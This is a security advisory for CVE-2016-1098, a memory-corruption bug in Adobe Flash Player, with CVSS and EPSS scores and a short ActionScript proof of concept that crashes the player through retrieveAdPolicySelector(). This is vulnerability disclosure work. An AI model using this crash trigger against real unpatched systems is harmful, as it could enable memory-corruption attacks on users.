7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
7.6 High
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:H/Au:N/C:C/I:C/A:C
0.008 Low
EPSS
Percentile
79.1%
II. Description
Adobe Flash is a multimedia and software platform used for authoring of vector graphics, animation, games and rich Internet applications (RIAs) that can be viewed, played and executed in Adobe Flash Player.
Normally, retrieveAdPolicySelector() should validates its parameter and returns error in AS3 level if anything goes wrong.
If retrieveAdPolicySelector() function is invoked directly with invalid parameter, some inner class instance will be absent, which will cause a memory crash.
POC Source Code:
package
{
import com.adobe.tvsdk.mediacore.ContentFactory;
import com.adobe.tvsdk.mediacore.MediaPlayerItem;
import com.adobe.tvsdk.mediacore.PSDK;
import flash.display.Sprite;
public class poc extends Sprite
{
public function poc()
{
var ps:PSDK = PSDK.pSDK;
var mt:MediaPlayerItem;
var obj:ContentFactory = ps.createDefaultContentFactory();
obj.retrieveAdPolicySelector(mt);
}
}
V. Credit
Wen Guanxing from Pangu LAB is credited for this vulnerability.
It has been assigned as CVE-2016-1098 by Adobe:
https://helpx.adobe.com/security/products/flash-player/apsb16-15.html
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
7.6 High
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:H/Au:N/C:C/I:C/A:C
0.008 Low
EPSS
Percentile
79.1%